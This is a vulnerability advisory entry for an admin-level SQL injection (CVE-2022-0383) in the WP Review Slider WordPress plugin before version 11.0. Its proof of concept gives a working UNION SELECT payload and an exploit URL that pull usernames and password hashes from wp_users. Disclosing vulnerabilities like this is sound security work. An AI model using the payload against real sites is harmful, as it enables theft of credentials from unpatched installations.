WordPress Plugin Vulnerabilities

WP Review Slider < 11.0 - Admin+ SQL Injection

Description

The plugin does not sanitise and escape the pid parameter when copying a Twitter source, which could allow a high privilege users to perform SQL Injections attacks

Proof of Concept

Create a Twitter Source, copy it via the 'Copy' button, then change the pid parameter in the URL to 1000 UNION ALL SELECT 1,user_login,3,user_pass,5,6,7,8,9,10,11 FROM wp_users LIMIT 1

https://example.com/wp-admin/admin.php?page=wp_fb-get_twitter&taction=copy&tid=1000+UNION+ALL+SELECT+1,user_login,3,user_pass,5,6,7,8,9,10,11+FROM+wp_users+LIMIT+1&_wpnonce=f5e77f3e34

Affects Plugins

Plugin icon
wp-facebook-reviews
Fixed in 11.0

References

CVE
CVE-2022-0383
URL
https://plugins.trac.wordpress.org/changeset/2666513

Classification

Type
SQLI
OWASP top 10
A1: Injection
CWE
CWE-89
CVSS
6.8 (medium)

Miscellaneous

Original Researcher
Felipe de Avila
Submitter
Felipe de Avila
Submitter twitter
ofelipedeavila
Verified
Yes
WPVDB ID
e0402753-3a80-455b-9fab-a7d2a7687193

Timeline

Publicly Published
2022-01-31 (about 2 years ago)
Added
2022-01-31 (about 2 years ago)
Last Updated
2022-04-12 (about 2 years ago)

Other

Published
Title
Published
2014-08-01
Title
Spreadsheet <= 0.6 - SQL Injection
Published
2015-05-25
Title
GigPress <= 2.3.8 - Authenticated SQL Injection
Published
2023-05-26
Title
QueryWall: Plug'n Play Firewall <= 1.1.1 - Admin+ SQLi
Published
2024-03-21
Title
Easy Property Listings < 3.5.3 - Authenticated(Contributor+) SQL Injection via Shortcode
Published
2020-08-10
Title
Cardoza WordPress Poll <= 36 - Authenticated SQL Injection